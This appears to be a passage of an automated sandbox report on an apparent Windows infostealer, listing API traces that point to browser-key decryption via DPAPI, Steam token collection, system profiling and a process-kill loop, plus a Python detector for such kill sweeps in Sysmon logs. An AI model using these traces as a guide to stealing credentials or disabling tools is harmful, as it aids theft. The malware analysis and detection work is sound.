                                • Opcode ID: e061b9ddb4a68bac76f17accfa90d3d59d32a97d38c34105c150e060bcd642e3
                                • Instruction ID: 35ae76181a8fbd3bebf4f8d7ab9329c3185d208e4b07bb2fe70d30106de3c808
                                • Opcode Fuzzy Hash: e061b9ddb4a68bac76f17accfa90d3d59d32a97d38c34105c150e060bcd642e3
                                • Instruction Fuzzy Hash: 5351E431A1421D9BCB20EF68DC45BEE77A4EF50314F154024FA49EB2A1DBB8ED44AB90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FF565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF5661
                                • InternetOpenA.WININET(0101CFEC,00000000,00000000,00000000,00000000), ref: 00FF5677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00FF5692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00FF56BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 00FF56E1
                                • InternetCloseHandle.WININET(?), ref: 00FF56FA
                                • InternetCloseHandle.WININET(00000000), ref: 00FF5701
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: d46a51908ac2825ff20901db5f0bf93ae28fa2e11d5c48a37721a4a09906e047
                                • Instruction ID: dc82e907ff561d7b656d1c6eb0fd015d69763571ff6aff5ab4b2dd0a53f48ee5
                                • Opcode Fuzzy Hash: d46a51908ac2825ff20901db5f0bf93ae28fa2e11d5c48a37721a4a09906e047
                                • Instruction Fuzzy Hash: 41418071E00218EFDB24DF55E988FAEB7B4FF44714F148069EB089B294E7719981CB94
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 01014759
                                • Process32First.KERNEL32(00000000,00000128), ref: 01014769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 0101477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 010147AB
                                • CloseHandle.KERNEL32(00000000), ref: 010147B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 010147C0
                                • CloseHandle.KERNEL32(00000000), ref: 010147CB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: b7fa2fe99cf05dc3bf4d1d4ce73719eab5856ed010fc68b58b542ae671751b44
                                • Instruction ID: c9d8a66ad4d71b527e75497b66f046c60e6001a32bfdd29e048b88c1f23810db
                                • Opcode Fuzzy Hash: b7fa2fe99cf05dc3bf4d1d4ce73719eab5856ed010fc68b58b542ae671751b44
                                • Instruction Fuzzy Hash: 640184715012287BEB715E64AC8DFEE77ECFB04755F0011C0FA45D5089DB78C9808B64
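The function at 01014759 is the classic Toolhelp32 kill loop: CreateToolhelp32Snapshot with 00000002 (TH32CS_SNAPPROCESS), Process32First/Process32Next to walk the list, OpenProcess with dwDesiredAccess 00000001 (PROCESS_TERMINATE, the minimum right for the job) and TerminateProcess on whichever entries match. The name comparison is not in this dump, so these lines do not tell which processes it goes after. On an endpoint running Sysmon, every OpenProcess becomes an Event ID 10 (ProcessAccess) record carrying the GrantedAccess mask, and that is the usable signal: Event ID 5 (ProcessTerminate) names only the victim, not the killer, and Event ID 10 is emitted only for targets the Sysmon configuration includes, so a configuration that watches only lsass.exe will miss this loop entirely. The Python below is an added example, not code from this report or from the sample; it runs over constructed Event ID 10 records (the target image names are illustrative) and flags a source that opens several distinct processes with exactly PROCESS_TERMINATE within a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Sysmon Event ID 10 (ProcessAccess) fields used below. GrantedAccess is the mask the source
# asked for; the kill loop in this report asks for exactly PROCESS_TERMINATE (0x1).
PROCESS_TERMINATE = 0x0001
SYSMON_TIME_FMT = "%Y-%m-%d %H:%M:%S.%f"

# Constructed events for the example; target names are illustrative, not taken from the sample.
SAMPLE_EVENTS = [
    {"UtcTime": "2024-11-20 10:15:01.100", "SourceImage": r"C:\Users\user\Desktop\file.exe",
     "TargetImage": r"C:\Windows\System32\Taskmgr.exe", "GrantedAccess": "0x1"},
    {"UtcTime": "2024-11-20 10:15:01.130", "SourceImage": r"C:\Users\user\Desktop\file.exe",
     "TargetImage": r"C:\Tools\procexp64.exe", "GrantedAccess": "0x1"},
    {"UtcTime": "2024-11-20 10:15:01.160", "SourceImage": r"C:\Users\user\Desktop\file.exe",
     "TargetImage": r"C:\Tools\x64dbg.exe", "GrantedAccess": "0x1"},
    # A debugger attaching with PROCESS_ALL_ACCESS: the terminate bit is set, but not alone.
    {"UtcTime": "2024-11-20 10:15:02.000", "SourceImage": r"C:\Tools\x64dbg.exe",
     "TargetImage": r"C:\Users\user\Desktop\file.exe", "GrantedAccess": "0x1fffff"},
    # A single legitimate kill by an updater, below the sweep threshold.
    {"UtcTime": "2024-11-20 10:15:03.000", "SourceImage": r"C:\Program Files\App\updater.exe",
     "TargetImage": r"C:\Program Files\App\app.exe", "GrantedAccess": "0x1"},
    # The same source much later with one open: not a second sweep.
    {"UtcTime": "2024-11-20 10:16:30.000", "SourceImage": r"C:\Users\user\Desktop\file.exe",
     "TargetImage": r"C:\Windows\System32\Taskmgr.exe", "GrantedAccess": "0x1"},
]


def find_terminate_sweeps(events, min_targets=3, window=timedelta(seconds=5)):
    """Return [(source_image, sorted target images)] for every burst in which one source
    opened at least `min_targets` distinct processes with a GrantedAccess of exactly
    PROCESS_TERMINATE inside `window`. Masks that merely include the bit (debuggers, WMI,
    AV engines) are ignored on purpose: the Toolhelp32 loop requests the minimum right it
    needs, and that minimalism is the signature."""
    by_source = defaultdict(list)
    for ev in events:
        if int(ev["GrantedAccess"], 16) != PROCESS_TERMINATE:
            continue
        by_source[ev["SourceImage"]].append(
            (datetime.strptime(ev["UtcTime"], SYSMON_TIME_FMT), ev["TargetImage"]))
    hits = []
    for source, opens in by_source.items():
        opens.sort()
        i = 0
        while i < len(opens):
            j = i
            while j < len(opens) and opens[j][0] - opens[i][0] <= window:
                j += 1
            targets = sorted({tgt for _, tgt in opens[i:j]})
            if len(targets) >= min_targets:
                hits.append((source, targets))
                i = j                      # one report per burst, then move past it
            else:
                i += 1
    return hits


if __name__ == "__main__":
    for source, targets in find_terminate_sweeps(SAMPLE_EVENTS):
        print(f"{source} opened {len(targets)} processes with PROCESS_TERMINATE:")
        for target in targets:
            print("   ", target)
```

The threshold and window are tuning knobs: three distinct targets in five seconds catches a sweep without firing on a single task-manager kill, and requiring the mask to equal 0x1 rather than contain it keeps debuggers and security tooling out of the results.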
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 01008435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100846C
                                • lstrlen.KERNEL32(00000000), ref: 010084B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010084E9
                                • lstrlen.KERNEL32(00000000), ref: 010084FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100852E
                                • StrCmpCA.SHLWAPI(00000000,01024C3C), ref: 0100853E
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 53377ec19b7ec1721e267c8b749921de60870d20af36b9629f90e4258c980d93
                                • Instruction ID: 4948cb95349befb7e41e337aeaa13453c1e421515075956494722ac8413af938
                                • Opcode Fuzzy Hash: 53377ec19b7ec1721e267c8b749921de60870d20af36b9629f90e4258c980d93
                                • Instruction Fuzzy Hash: 53519E719002059FEB65DF68D888A6ABBF8FF44300F15C45EED86DB289EB35E941CB50
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 01012925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0101292C
                                • RegOpenKeyExA.ADVAPI32(80000002,00D5B858,00000000,00020119,010128A9), ref: 0101294B
                                • RegQueryValueExA.ADVAPI32(010128A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 01012965
                                • RegCloseKey.ADVAPI32(010128A9), ref: 0101296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 1ffa90562cbb8ba4b42a1b382035251173ad7b82debd63b315d251fc67349735
                                • Instruction ID: da16c011e581b2a282c30b5cfb970aa56426609b1fd09c7027e74c14c876b968
                                • Opcode Fuzzy Hash: 1ffa90562cbb8ba4b42a1b382035251173ad7b82debd63b315d251fc67349735
                                • Instruction Fuzzy Hash: 9601B575500218BBD730CFA4AC5DEEF7BECEB44755F200098FE85D7245E63556448790
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 01012895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0101289C
                                  • Part of subcall function 01012910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 01012925
                                  • Part of subcall function 01012910: RtlAllocateHeap.NTDLL(00000000), ref: 0101292C
                                  • Part of subcall function 01012910: RegOpenKeyExA.ADVAPI32(80000002,00D5B858,00000000,00020119,010128A9), ref: 0101294B
                                  • Part of subcall function 01012910: RegQueryValueExA.ADVAPI32(010128A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 01012965
                                  • Part of subcall function 01012910: RegCloseKey.ADVAPI32(010128A9), ref: 0101296F
                                • RegOpenKeyExA.ADVAPI32(80000002,00D5B858,00000000,00020119,01009500), ref: 010128D1
                                • RegQueryValueExA.ADVAPI32(01009500,00D6EB98,00000000,00000000,00000000,000000FF), ref: 010128EC
                                • RegCloseKey.ADVAPI32(01009500), ref: 010128F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 0fe920702db86d43bc4c91a668d2a04670e99d12e9aef0a956c53a5778818444
                                • Instruction ID: 6f3ddc6836efe311912cbf55e35eddbdb162a39cbf63bab2d659a803e161d47b
                                • Opcode Fuzzy Hash: 0fe920702db86d43bc4c91a668d2a04670e99d12e9aef0a956c53a5778818444
                                • Instruction Fuzzy Hash: C601A271600219BBDB30DFA4FC4DFAE77ADEB44215F100158FE08D6248E6749A4487A0
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 00FF723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00FF7279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00FF72C3
                                • HeapFree.KERNEL32(00000000), ref: 00FF72CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00FF7329
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: c2dd71803276c4277ae2075c325fef254b1769d0d589d4b0b66a0099eb3e399d
                                • Instruction ID: 03e50b1f5e2e6d3e34d21f03df17ddfe3230aa1cc2fde7649fb4d6303639e4d8
                                • Opcode Fuzzy Hash: c2dd71803276c4277ae2075c325fef254b1769d0d589d4b0b66a0099eb3e399d
                                • Instruction Fuzzy Hash: 73414E71A05709ABDB20DF69E884BBAF3E8FF88315F144569ED4DC7350E631E940AB50
                                APIs
                                • memset.MSVCRT ref: 0100D7D6
                                • RegOpenKeyExA.ADVAPI32(80000001,00D6DA90,00000000,00020119,?), ref: 0100D7F5
                                • RegQueryValueExA.ADVAPI32(?,00D6ECB8,00000000,00000000,00000000,000000FF), ref: 0100D819
                                • RegCloseKey.ADVAPI32(?), ref: 0100D823
                                • lstrcat.KERNEL32(?,00000000), ref: 0100D848
                                • lstrcat.KERNEL32(?,00D6EE20), ref: 0100D85C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: bbcadfc3f2c38d1bc887f15c6733ff1ed3b18dab00ce2541bef0cd087311ed31
                                • Instruction ID: cdc2f61df04106d1be692758814a7631fba74e255e51dee39318a740d39517ba
                                • Opcode Fuzzy Hash: bbcadfc3f2c38d1bc887f15c6733ff1ed3b18dab00ce2541bef0cd087311ed31
                                • Instruction Fuzzy Hash: F141937161010CAFDB64EF64EC86ADD77B8AF54304F008064FA0997290EB39EB899F91
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00FF9CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00FF9CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FF9D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: ce5d4687b9a2f53b017bdaafe0cfd640cd541d0456728f069244027d8c750e1b
                                • Instruction ID: fa779106ef27f5e08d5967889f33af6ce3db5f7cd20837090a0b9cbc84e9c4ac
                                • Opcode Fuzzy Hash: ce5d4687b9a2f53b017bdaafe0cfd640cd541d0456728f069244027d8c750e1b
                                • Instruction Fuzzy Hash: DC41B031E0420E9BCB21EF64DC457BE77B4AF94314F144468EA55AB2A2DBB4ED00EB90
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100EA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100EA53
                                • lstrcat.KERNEL32(?,00000000), ref: 0100EA61
                                • lstrcat.KERNEL32(?,01021794), ref: 0100EA7A
                                • lstrcat.KERNEL32(?,00D68850), ref: 0100EA8D
                                • lstrcat.KERNEL32(?,01021794), ref: 0100EA9F
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: bcd55da00f506730e91dd39700931e14bb2193d4b5eabe6ab3bc76c114b98f26
                                • Instruction ID: 4c2bdeee3b75ca9a8b517e64a90593f0186ba0c96cb120542f090e60415f5004
                                • Opcode Fuzzy Hash: bcd55da00f506730e91dd39700931e14bb2193d4b5eabe6ab3bc76c114b98f26
                                • Instruction Fuzzy Hash: 7641827191011CAFDB75EF64EC45AFD73B4BF98300F0048A8FA1A97294DB789E849B90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100ECDF
                                • lstrlen.KERNEL32(00000000), ref: 0100ECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100ED1D
                                • lstrlen.KERNEL32(00000000), ref: 0100ED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0100ED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 7b1a42ae5a96613fbae5123df466b10ae7d27ec090b5b56e77feef524d61791a
                                • Instruction ID: 4b617fd8de2a82cdab60f81943008ed4e8611b6e4679c761c6ccf72edaed3733
                                • Opcode Fuzzy Hash: 7b1a42ae5a96613fbae5123df466b10ae7d27ec090b5b56e77feef524d61791a
                                • Instruction Fuzzy Hash: 8531B431A101195BE772BF7CEC4AA6E7BA8AF40300F041474FA85EB2A2DB6CDC1567C1
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00FF140E), ref: 00FF9A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00FF140E), ref: 00FF9AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,00FF140E), ref: 00FF9AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,00FF140E,00000000,?,?,?,00FF140E), ref: 00FF9AE0
                                • LocalFree.KERNEL32(?,?,?,?,00FF140E), ref: 00FF9B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,00FF140E), ref: 00FF9B07
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 26ab96a225ca5e1f0980af24efb29611c930bfa4396cbc26b28c5d2fa671e375
                                • Instruction ID: add6a15d5767f2f7f2301a4a15f8c4401edeca2765e9bc989f246497613c46e2
                                • Opcode Fuzzy Hash: 26ab96a225ca5e1f0980af24efb29611c930bfa4396cbc26b28c5d2fa671e375
                                • Instruction Fuzzy Hash: 1C114F71A04219AFEB20DE69EC88FBE736CEF44354F104159FB0196290D7B4DE40DB60
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 01015B14
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A188
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 01015B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 01015B89
                                • memmove.MSVCRT(00000000,?,?), ref: 01015B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: 8a7a49d4169fa2454e5de1abd2373480027712a4f51f37f3cb49fd9baea35ff8
                                • Instruction ID: d0d65284dbe0d66c99198758f741689bcb6090c30aa6282cc44df0fde1fa3c0f
                                • Opcode Fuzzy Hash: 8a7a49d4169fa2454e5de1abd2373480027712a4f51f37f3cb49fd9baea35ff8
                                • Instruction Fuzzy Hash: D7417F71B001199FCF18DF6CCD95AAEBBF5EB89210F148269E909EB348E634DD01CB90
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: dd9284555b5582e1e00358eacaea678d0eb77393f21885b9d3015fd7f4f22340
                                • Instruction ID: 9ec4140460f662a9a53dce104bc237cf42d74732a0b87620877452329263ac59
                                • Opcode Fuzzy Hash: dd9284555b5582e1e00358eacaea678d0eb77393f21885b9d3015fd7f4f22340
                                • Instruction Fuzzy Hash: 0341E87150075C9EEB318B28CC94FFB7BFCAB45708F1844ECDAC686186E2759A858F60
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 01007D58
                                  • Part of subcall function 0101A1C0: std::exception::exception.LIBCMT ref: 0101A1D5
                                  • Part of subcall function 0101A1C0: std::exception::exception.LIBCMT ref: 0101A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 01007D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 01007D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: 92e592118c1fba7419bd7732304c8f3c688ee058a4f38cc0af54c40edc2a79f3
                                • Instruction ID: 221a52980bcb14c2bede6a2cfc36e8303981f5a3b5fcd0ad2ebcb483e6bab575
                                • Opcode Fuzzy Hash: 92e592118c1fba7419bd7732304c8f3c688ee058a4f38cc0af54c40edc2a79f3
                                • Instruction Fuzzy Hash: 6D21E6323002408BE722EE6CD880A7AB7F5AF95760F244A6FE5C1CB381D774EC008361
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 010133EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 010133F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 01013411
                                • wsprintfA.USER32 ref: 01013437
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 18291ed33f86cb9d620553ee6acc922bc147fdf30718d037a68297d598a0bf20
                                • Instruction ID: 1b6e60ad14defaafc7565d383fed7930e20313ce6d83fdde1becf409cc6816fd
                                • Opcode Fuzzy Hash: 18291ed33f86cb9d620553ee6acc922bc147fdf30718d037a68297d598a0bf20
                                • Instruction Fuzzy Hash: CE01DD71A44218BFDB24DF98EC49BBEB7B8FB45720F404129F905DB344DB7859008795
                                APIs
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlenmemset
                                • String ID:
                                • API String ID: 3212139465-0
                                • Opcode ID: 83d61c032b09d91f140ece331ba3f8c3fa86c92d6b9a53eb76bd332633bd9792
                                • Instruction ID: 08bcd4042ad0d40c617e2d582a99722ba178d362b5ff402b5cd4d418255b4175
                                • Opcode Fuzzy Hash: 83d61c032b09d91f140ece331ba3f8c3fa86c92d6b9a53eb76bd332633bd9792
                                • Instruction Fuzzy Hash: 42810970D002059BEB14CF98DC84BAEBBB5FF84304F2480ADE649A7385EB799945CB94
                                APIs
